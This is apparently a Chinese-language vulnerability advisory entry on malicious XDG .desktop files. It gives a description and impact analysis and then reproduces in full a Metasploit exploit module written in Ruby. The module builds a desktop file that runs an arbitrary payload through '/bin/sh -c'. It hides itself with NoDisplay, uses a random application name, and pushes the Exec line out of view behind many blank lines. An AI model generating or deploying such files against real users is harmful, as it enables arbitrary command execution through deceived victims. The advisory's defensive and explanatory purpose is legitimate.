Malicious XDG Desktop File

漏洞信息

漏洞名称： Malicious XDG Desktop File

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： 该漏洞涉及恶意XDG桌面（.desktop）文件的创建与利用。在现代系统中，桌面文件默认不被信任，用户在执行此类文件时会收到警告提示，但仍可选择执行。某些桌面环境中的默认文件管理器应用可能会实施更严格的执行要求，如提示用户将文件设置为可执行和/或将文件标记为受信任后才能执行。

受影响产品: XDG桌面文件是一种在Linux、Unix、Solaris和FreeBSD等操作系统中广泛使用的桌面条目规范，用于定义应用程序的启动方式、图标、名称等。这种文件格式被多种桌面环境支持，如GNOME、KDE等，是这些系统中应用程序集成的重要组成部分。

漏洞解释: 此漏洞属于文件上传类型，攻击者可以创建一个恶意的.desktop文件，通过诱骗用户执行该文件，从而在受害者系统上执行任意命令。漏洞的技术根源在于.desktop文件的执行机制，允许通过Exec字段指定要执行的命令，而缺乏足够的验证和警告机制来防止恶意利用。

影响分析: 此漏洞的高危性在于，一旦用户执行了恶意.desktop文件，攻击者可以在受害者系统上执行任意命令，可能导致远程代码执行、数据泄露或服务中断。虽然大多数现代系统会提示用户文件不受信任，但用户可能因缺乏安全意识而忽略警告。此外，某些桌面环境的文件管理器可能要求额外的步骤（如设置文件为可执行或标记为受信任），这在一定程度上增加了利用难度，但仍无法完全防止攻击。

产品名称： XDG Desktop

来源： https://github.com/rapid7/metasploit-framework/blob/5fd61844944459bee5ba99996ee4dec0ce52b092/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

类型： rapid7/metasploit-framework:github commit

POC详情

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    desktop << "\n" * datastore['PrependNewLines']

    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end